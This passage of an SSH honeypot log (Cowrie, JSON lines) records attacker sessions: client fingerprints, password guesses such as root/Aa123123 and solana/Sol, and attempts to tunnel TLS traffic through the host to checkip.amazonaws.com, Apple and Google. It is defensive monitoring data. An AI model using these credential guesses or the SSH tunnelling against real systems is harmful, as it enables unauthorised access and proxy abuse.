5519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T05:24:54.900585Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:24:54.991506Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.216.40.100","dst_port":443,"src_ip":"194.0.234.21","src_port":40120,"message":"direct-tcp connection request to 54.216.40.100:443 from 127.0.0.1:40120","sensor":"my-vps","timestamp":"2025-08-26T05:24:55.328429Z","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.216.40.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03x\\x1aH4 \\xf8ab`\\xcc\\xdaI\\x9e\\xf9\\xce+\\xf3\\xd7\\x8c\\xd2&\\x03\\xdd.+%\\x88\\xad\\x9e%\\xbc\\xe9 \\x9dO\\xb3Y\\x7f\\xbcp-\\xac\\x18(\\x0fC)j\\xdd\\xfb*\\x93\\xaa:\\xa3\\x16\\x8e\\x97J\\x8d\\xf2\\x04_%x\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xdaX\\x07\\xf1H\\x8e\\x02\\x14x*l\\x96\\xb5\\x1d\\x10FR\\x18\\x17\\xd9\\xf5r\\xd2'N\\xb7%\\xad\\xb8+CX\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.216.40.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03x\\x1aH4 \\xf8ab`\\xcc\\xdaI\\x9e\\xf9\\xce+\\xf3\\xd7\\x8c\\xd2&\\x03\\xdd.+%\\x88\\xad\\x9e%\\xbc\\xe9 \\x9dO\\xb3Y\\x7f\\xbcp-\\xac\\x18(\\x0fC)j\\xdd\\xfb*\\x93\\xaa:\\xa3\\x16\\x8e\\x97J\\x8d\\xf2\\x04_%x\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xdaX\\x07\\xf1H\\x8e\\x02\\x14x*l\\x96\\xb5\\x1d\\x10FR\\x18\\x17\\xd9\\xf5r\\xd2'N\\xb7%\\xad\\xb8+CX\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:24:55.392784Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"194.0.234.21","src_port":40376,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:40376","sensor":"my-vps","timestamp":"2025-08-26T05:24:55.465367Z","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03<\\\\\\xbbCm\\x1e\\x8b\\xcb\\x10\\xd2N\\x83ikB0o\\xc7\\x19\\x83\\r\\x19\\rG\\xbb\\x19\\xbd\\xe1C\\x15\\x0cJ \\xcce3\\x84D\\x94\\xa9\\xe1qW\\xfa\\xa1\\xc4\\xf8\\xbc^\\xaaC\\xad\\x06\\xad\\x04\\xa5\\xbd\\x98\\xfe\\xc2\\xe3\\xa6W\\x9e\\xad\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xba\\xc2\\x13]j\\xa1\\xbf36\\xe9w\\xce\\xa0\\x1ag\\x8ae\\x8b\\xf4\\xc4C\\x0b\\x8a\\x01n\\x8c'\\xc1\\x11\\xbb\\x96\\x16\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03<\\\\\\xbbCm\\x1e\\x8b\\xcb\\x10\\xd2N\\x83ikB0o\\xc7\\x19\\x83\\r\\x19\\rG\\xbb\\x19\\xbd\\xe1C\\x15\\x0cJ \\xcce3\\x84D\\x94\\xa9\\xe1qW\\xfa\\xa1\\xc4\\xf8\\xbc^\\xaaC\\xad\\x06\\xad\\x04\\xa5\\xbd\\x98\\xfe\\xc2\\xe3\\xa6W\\x9e\\xad\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xba\\xc2\\x13]j\\xa1\\xbf36\\xe9w\\xce\\xa0\\x1ag\\x8ae\\x8b\\xf4\\xc4C\\x0b\\x8a\\x01n\\x8c'\\xc1\\x11\\xbb\\x96\\x16\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:24:55.925080Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"194.0.234.21","src_port":41460,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:41460","sensor":"my-vps","timestamp":"2025-08-26T05:24:57.044973Z","session":"9b894c617c73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03`\\x94n\\xab\\xbe\\xf7T\\x80K\\x07\\x08_\\x9a\\xc4Y\\xca\\xbc`\\x0e\\xe1\\x96\\xfd\\x8e;\\xe0;\\xfe\\x8b\\x13\\x8bP- \\xeb9\\\\\\xb1\\xc5\\n(\\x08\\tL\\x9e\\x85\\xfc\\x88r\\x1fh\\xb6Qt5\\xfc?\\x8e\\x130\\xa1\\x12wg\\x13\\xd8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x98\\xdb\\x95F\\xfc\\x0b=\\xa9Z\\r\\xc0\\xc9q\\xd2\\x0bi\\xb2P\\xbd\\xab\\xc0\\xc7\\xda4\\xaeAo:\\xee\\xf1\\x8ag\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03`\\x94n\\xab\\xbe\\xf7T\\x80K\\x07\\x08_\\x9a\\xc4Y\\xca\\xbc`\\x0e\\xe1\\x96\\xfd\\x8e;\\xe0;\\xfe\\x8b\\x13\\x8bP- \\xeb9\\\\\\xb1\\xc5\\n(\\x08\\tL\\x9e\\x85\\xfc\\x88r\\x1fh\\xb6Qt5\\xfc?\\x8e\\x130\\xa1\\x12wg\\x13\\xd8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x98\\xdb\\x95F\\xfc\\x0b=\\xa9Z\\r\\xc0\\xc9q\\xd2\\x0bi\\xb2P\\xbd\\xab\\xc0\\xc7\\xda4\\xaeAo:\\xee\\xf1\\x8ag\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:24:58.048876Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:24:58.320272Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61944,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71245e7d625","protocol":"ssh","message":"New connection: 217.72.205.35:61944 (1.2.3.4:22) [session: d71245e7d625]","sensor":"my-vps","timestamp":"2025-08-26T05:25:21.298645Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:25:21.299709Z","src_ip":"217.72.205.35","session":"d71245e7d625"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":56658,"dst_ip":"1.2.3.4","dst_port":22,"session":"40ffe6715208","protocol":"ssh","message":"New connection: 93.123.109.181:56658 (1.2.3.4:22) [session: 40ffe6715208]","sensor":"my-vps","timestamp":"2025-08-26T05:26:08.759584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:26:08.760363Z","src_ip":"93.123.109.181","session":"40ffe6715208"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:26:08.780106Z","src_ip":"93.123.109.181","session":"40ffe6715208"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Sol","message":"login attempt [solana/Sol] failed","sensor":"my-vps","timestamp":"2025-08-26T05:26:08.839443Z","src_ip":"93.123.109.181","session":"40ffe6715208"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:26:09.861188Z","src_ip":"93.123.109.181","session":"40ffe6715208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51756,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d3ef0a13ded","protocol":"ssh","message":"New connection: 212.227.235.229:51756 (1.2.3.4:22) [session: 5d3ef0a13ded]","sensor":"my-vps","timestamp":"2025-08-26T05:26:35.972010Z"}
